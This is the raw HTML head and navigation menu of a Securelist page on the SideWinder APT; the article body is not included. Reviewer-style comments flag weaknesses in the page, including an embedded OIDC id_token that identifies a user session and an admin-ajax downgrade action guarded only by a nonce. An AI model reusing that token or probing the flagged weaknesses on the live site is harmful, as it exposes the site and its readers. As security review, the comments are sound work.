SideWinder APT’s post-exploitation framework analysis | Securelist

<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <!-- Gravity Forms hook bootstrap (minified): a tiny action/filter registry. Note for reviewers: in doHook a hook whose callable is a string is resolved as window[name] at dispatch time, so a hook registered by name binds to whatever global carries that name when the hook fires, not when it was added. --> <script type="text/javascript"> /* <![CDATA[ */ var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&&gform.scriptsLoaded?o():!gform.domLoaded&&gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&&(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&&(i=n+"_"+e.length),gform.hooks[o][n].push({tag:i,callable:r,priority:t=null==t?10:t})},doHook:function(n,o,r){var t;if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[n][o]&&((o=gform.hooks[n][o]).sort(function(o,n){return o.priority-n.priority}),o.forEach(function(o){"function"!=typeof(t=o.callable)&&(t=window[t]),"action"==n?t.apply(null,r):r[0]=t.apply(null,r)})),"filter"==n)return r[0]},removeHook:function(o,n,t,i){var r;null!=gform.hooks[o][n]&&(r=(r=gform.hooks[o][n]).filter(function(o,n,r){return!!(null!=i&&i!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][n]=r)}}); /* ]]> */ </script> <link rel="profile" href="http://gmpg.org/xfn/11" /> <!-- the XFN profile is referenced over plain http; it is metadata only and is not fetched by browsers, so this is scheme hygiene rather than a mixed-content risk, but https://gmpg.org/xfn/11 is the consistent form. --> <link rel="pingback" href="https://securelist.com/xmlrpc.php" /> <!-- review note: this advertises the XML-RPC endpoint for pingbacks. If pingbacks are not actually used, disabling XML-RPC removes a frequently probed endpoint from the site surface. --> <link 
rel="apple-touch-icon" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="48x48" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-48x48.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-16x16.png"> <link rel="manifest" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/site.webmanifest"> <title>SideWinder APT’s post&#x2d;exploitation framework analysis | Securelist</title> <!-- The SEO Framework by Sybre Waaijer --> <meta name="keywords" content="APT,Backdoor,Malware,Malware Descriptions,Malware Technologies,SideWinder,Targeted attacks,Trojan" /> <link rel="canonical" href="https://securelist.com/sidewinder-apt/114089/" /> <meta name="description" content="Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post&#x2d;exploitation tools and techniques." /> <meta property="og:type" content="article" /> <meta property="og:title" content="SideWinder APT’s post&#x2d;exploitation framework analysis" /> <meta property="og:description" content="Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post&#x2d;exploitation tools and techniques." 
/> <meta property="og:url" content="https://securelist.com/sidewinder-apt/114089/" /> <meta property="og:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured.jpg" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@Securelist" /> <meta name="twitter:creator" content="@Securelist" /> <meta name="twitter:title" content="SideWinder APT’s post&#x2d;exploitation framework analysis" /> <meta name="twitter:description" content="Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post&#x2d;exploitation tools and techniques." /> <meta name="twitter:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured.jpg" /> <!-- structured data for the article. The JSON-LD headline ("Beyond the Surface: the evolution and expansion of the SideWinder APT group") differs from the <title> and og:title above; both are server-rendered, so the two sources are worth aligning. JSON does not allow comments, hence this note sits outside the script. --> <script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://securelist.com/sidewinder-apt/114089/"},"headline":"Beyond the Surface: the evolution and expansion of the SideWinder APT group","image":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured.jpg","datePublished":"2024-10-15T10:00:54+00:00","dateModified":"2024-10-18T11:18:34+00:00","author":{"@type":"Person","name":"Giampaolo Dedola","url":"https://securelist.com/author/giampaolodedola/"},"publisher":{"@type":"Organization","name":"Kaspersky","logo":{"@type":"ImageObject","url":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/06/04065705/article-logo-small_new.png","width":60,"height":60}},"description":"Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post\u0026#x2d;exploitation tools and techniques."}</script> <!-- / The SEO Framework by Sybre Waaijer | 101.71ms meta | 0.22ms boot --> <link rel='dns-prefetch' href='//kasperskycontenthub.com' /> <link 
rel='dns-prefetch' href='//securelist.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//media.kaspersky.com' /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Feed" href="https://securelist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Comments Feed" href="https://securelist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Beyond the Surface: the evolution and expansion of the SideWinder APT group Comments Feed" href="https://securelist.com/sidewinder-apt/114089/feed/" /> <!-- the minified stylesheet bundles are referenced protocol-relative (//assets.kasperskycontenthub.com). Harmless on an https page, but an explicit https: scheme is the safer convention and removes any dependence on the embedding page's scheme. --> <link rel='stylesheet' id='crayon-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css,wp-content/plugins/crayon-syntax-highlighter/themes/classic/classic.css,wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css,wp-includes/css/dist/block-library/style.min.css,wp-content/plugins/jquery-collapse-o-matic/css/core_style.css,wp-content/plugins/jquery-collapse-o-matic/css/light_style.css,wp-content/plugins/kspr_twitter_pullquote/css/style.css,wp-content/themes/securelist2020/assets/css/main.css,wp-content/plugins/kaspersky-social-sharing/assets/css/style.css,wp-content/plugins/kaspersky-social-sharing/assets/css/custom.css' type='text/css' media='all' /> <link rel='stylesheet' id='taxonomy-image-plugin-public-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' /> <script type="text/javascript" src="https://securelist.com/wp-content/plugins/kaspersky-enable-jquery-migrate-helper/js/jquery/jquery-1.12.4-wp.js?ver=1.12.4-wp" id="jquery-core-js"></script> <!-- review note: jQuery 1.12.4 is served here through a "jquery-migrate-helper" plugin. The 1.x line is end-of-life and no longer receives security fixes; the plugin name suggests this is a deliberate compatibility hold for older theme/plugin code, so the upgrade to a supported 3.x release should be tracked rather than left open. --> <script type="text/javascript" 
id="kaspersky-sso-integration-js-extra"> /* <![CDATA[ */ /* OIDC endpoints for the Kaspersky SSO integration: the authorize URL used to start login and the end-session URL used for logout. */ var kasperskySSOIntegrationData = {"authorizationURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/authorize?client_id=securelist&client_name=Securelist&redirect_uri=https%3A%2F%2Fsecurelist.com%2Fkaspersky-sso%2Flogin%2F&response_type=code&scope=openid email profile offline_access","endSessionURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/endsession?id_token_hint=eyJhbGciOiJSUzI1NiIsImtpZCI6IkNCNzFGQTExMjc4MzgyMzQ3OTAxNzlENkJGMkVBNkFCRkZGOEQ5OUYiLCJ4NXQiOiJ5M0g2RVNlRGdqUjVBWG5Xdnk2bXFfXzQyWjgiLCJ0eXAiOiJKV1QifQ.eyJhdF9oYXNoIjoiZDZVNFRvSi1MamJMdVlpR3VRNHFOQSIsInNpZCI6ImNrblhXczF5UFotYVVmRmJWQUZzN0EiLCJzdWIiOiIwMmU0MWE1My03MmY1LTQyNmYtYTUxNS1hMzFjZjc3NjZjODEiLCJhdXRoX3RpbWUiOiIxNzMyNTIyNjE2IiwiaWRwIjoiS2FzcGVyc2t5SWQiLCJrYXNwZXJza3kuc3ViX3ZlcnNpb24iOiIxIiwia2FzcGVyc2t5LnN1c3BpY2lvdXNfYXV0aGVudGljYXRpb24iOiJmYWxzZSIsIm5iZiI6MTczMjUyMjYxOSwiZXhwIjoxNzMyNjA5MDE5LCJpYXQiOjE3MzI1MjI2MTksImlzcyI6Imh0dHBzOi8vYXV0aC5jYS51aXMua2FzcGVyc2t5LmNvbSIsImF1ZCI6InNlY3VyZWxpc3QifQ.OguUvee3qrjOD6Dd5MSQFF3NfOlluXFgG5RYs3v287UUNcgvJChXtDsi0F5YA_VdzXCHz4PpZ4z9nQmK7YLleUEAFDYa1fPkE2gzooA3B8GPp66rVQBr8OFh5HpLkVOhFPk1QFGYe6igJ_7SS5CeVLci8QL6W4G6WdihuSNv9A8xhq0w5zzDT17cVJZvp_eFxoV7LYc5rHgx6MKw--NbK45pH0868zh1C_nivtFsWDGy61pk3DMBiyApBtjNAYMa409CDPKQHm6LknLVeMdedGDE64jbAXb0lD94TcHQzaSiO4QP0Vm6OWOKk1bXR21onCMoD5XrqJAaRtPtu-Yb0A&post_logout_redirect_uri=https:\/\/securelist.com\/kaspersky-sso\/logout\/"}; /* ]]> */ </script> <!-- review note: endSessionURL above embeds a complete id_token as id_token_hint in the page source. Its header says RS256 and its payload is plain base64 carrying sub, sid, auth_time, nbf/iat/exp (a 24 hour window) and iss. It is a logout hint, not a bearer credential, but it identifies the subject and the session, and every cache, proxy log, scrape or archive of this HTML keeps a copy. Building the end-session URL server-side at logout time, or exposing only post_logout_redirect_uri here, would keep the token out of the document. The authorize URL also requests offline_access (a refresh token); confirm that scope is needed for a reader login. --> <script type="text/javascript" id="kss_js-js-extra"> /* <![CDATA[ */ var kss = {"twitter_account":"Securelist"}; /* ]]> */ </script> <script type='text/javascript' 
src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/kaspersky-lazy-load/assets/js/lazyload.js,wp-content/plugins/kaspersky-sso-integration/assets/js/main.js,wp-content/plugins/kspr_twitter_pullquote/js/kaspersky-twitter-pullquote.js,wp-content/plugins/kaspersky-social-sharing/assets/js/social-share.js'></script> <link rel="alternate" hreflang="x-default" href="https://securelist.com/sidewinder-apt/114089/" /> <!-- page metadata pushed to the analytics dataLayer before the tag manager loads --> <script> window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'Author' : 'Giampaolo Dedola', 'PostId' : '114089', 'PublicationDate' : '2024-10-15', 'Categories': 'APT reports', 'Tags': 'APT, Backdoor, Malware, Malware Descriptions, Malware Technologies, SideWinder, Targeted attacks, Trojan', }); </script> <!-- review note: two GTM containers (GTM-5CGZ3HG and GTM-WZ7LJ3) are bootstrapped back to back with identical loaders. Both push a gtm.start event onto the same dataLayer, and every tag configured in either container executes as first-party script on this page, so the set of third-party code here is governed outside this template. One container is the usual setup; if both are intentional, document why and make sure the CSP script-src allowlist is reviewed against the tags in both. --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5CGZ3HG');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WZ7LJ3');</script> <!-- End Google Tag Manager --> <link rel="https://api.w.org/" href="https://securelist.com/wp-json/" /><link rel="alternate" type="application/json" href="https://securelist.com/wp-json/wp/v2/posts/114089" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securelist.com/xmlrpc.php?rsd" /> <link rel="alternate" type="application/json+oembed" 
href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fsidewinder-apt%2F114089%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fsidewinder-apt%2F114089%2F&#038;format=xml" /> <!-- loads a domain-mapping script from kasperskycontenthub.com; the dm= value and t= parameter look page-generated, so the response cannot be pinned with integrity and that origin has to be trusted as first-party code. --> <script type="text/javascript"> var sNew = document.createElement("script"); sNew.async = true; sNew.src = "https://kasperskycontenthub.com/?dm=ed1f9e435dc885292eab65620c51f3fb&action=load&blogid=43&siteid=1&t=1849899041&back=https%3A%2F%2Fsecurelist.com%2Fsidewinder-apt%2F114089%2F"
var s0 = document.getElementsByTagName('script')[0]; s0.parentNode.insertBefore(sNew, s0); </script> <!-- review note: the Marketo loader below injects its script tag through document.write(unescape(...)) from a protocol-relative URL. document.write blocks the parser, is not allowed under a nonce- or hash-based CSP, and the injected tag carries no integrity attribute; a regular async script element with an explicit https: URL loads the same file without those drawbacks. --> <script type="text/javascript"> document.write(unescape("%3Cscript src='//munchkin.marketo.net/munchkin.js' type='text/javascript'%3E%3C/script%3E")); </script> <script>Munchkin.init('802-IJN-240');</script> <meta name="google-site-verification" content="o48MojucKcP-DT5iCMR8AsvkVWP14fE78flHCqqjo50" /> <script type="text/javascript"> /* jQuery Migrate helper: a global error handler. On the first "X is not a function" error where X is one of the removed jQuery 1.x APIs listed in jQueryFunctions, it POSTs a downgrade request to admin-ajax.php, authenticated only by the nonce baked into this page, and reloads if the JSON response asks for it. It returns true for every error, so all other runtime errors are suppressed from the console as well. Review note: presumably the downgrade changes the jQuery build served to all visitors; confirm the admin-ajax action enforces a capability check rather than relying on the nonce alone. */ var jQueryMigrateHelperHasSentDowngrade = false; window.onerror = function( msg, url, line, col, error ) { // Break out early, do not process if a downgrade request was already sent.
if ( jQueryMigrateHelperHasSentDowngrade ) { return true; } var xhr = new XMLHttpRequest(); var nonce = '4ed5b6ce96'; var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ]; var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern ); // If there was no matching function, do not try to downgrade.
if ( typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; } // Set that we've now attempted a downgrade request.
jQueryMigrateHelperHasSentDowngrade = true; xhr.open( 'POST', 'https://securelist.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } } // Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience.
if ( reload ) { location.reload(); } }; xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) ); // Suppress error alerts in older browsers
return true; } </script> <!-- review note: this div sits inside <head>. The HTML parser ends <head> at the first <div>, so the two SDK loaders, the icon links, the tile meta and the explicit </head> after it are all parsed as body content, and the later <body class="..."> start tag only merges its attributes onto the already-open body element. Move the div and the loaders to the top of <body> so the head stays well-formed. --> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=160639043985664"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <!-- the Facebook and Google SDKs above are loaded protocol-relative; both are rolling builds, so integrity cannot be pinned and the CSP script-src allowlist is the only control over what they execute. An explicit https: scheme is still preferable. --> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-270x270.png" /> </head> <body class="post-template-default single single-post 
data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/hybrid-cloud-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Optimum</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-anti-targeted-attack-platform menu-item menu-item-type-custom menu-item-object-custom menu-item-87731"><figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/anti-targeted-attack-platform.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Anti Targeted Attack Platform</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112325"><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 
data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Hybrid Cloud Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112326"><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SD-WAN</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-private-security-network menu-item menu-item-type-custom menu-item-object-custom menu-item-87732"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/private-security-network.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Industrial CyberSecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-embedded-systems-security menu-item menu-item-type-custom menu-item-object-custom 
menu-item-87733"><figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/embedded-systems-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Container Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Products</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112328"><a href="https://www.kaspersky.com/enterprise-security/products/internet-gateway?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Internet Gateway</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112329"><a href="https://www.kaspersky.com/enterprise-security/embedded-systems?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Embedded Systems Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112330"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom 
menu-item-object-custom menu-item-112331"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112332"><a href="https://www.kaspersky.com/enterprise-security/mail-server-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Mail Server</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87740"><a target="_blank" href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87741"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Services</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87742"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-cybersecurity-services menu-item menu-item-type-custom menu-item-object-custom menu-item-87743"><figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/cybersecurity-services.png"</a></figure><a 
href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Cybersecurity Services</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-105619"><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Security Awareness</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-premium-support menu-item menu-item-type-custom menu-item-object-custom menu-item-87745"><figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/premium-support.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Premium Support</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-intelligence menu-item menu-item-type-custom menu-item-object-custom menu-item-87746"><figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-intelligence.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Threat Intelligence</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-incident-response menu-item menu-item-type-custom menu-item-object-custom menu-item-87748"><figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/incident-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Managed Detection and Response</a><div class="desc"><p><a 
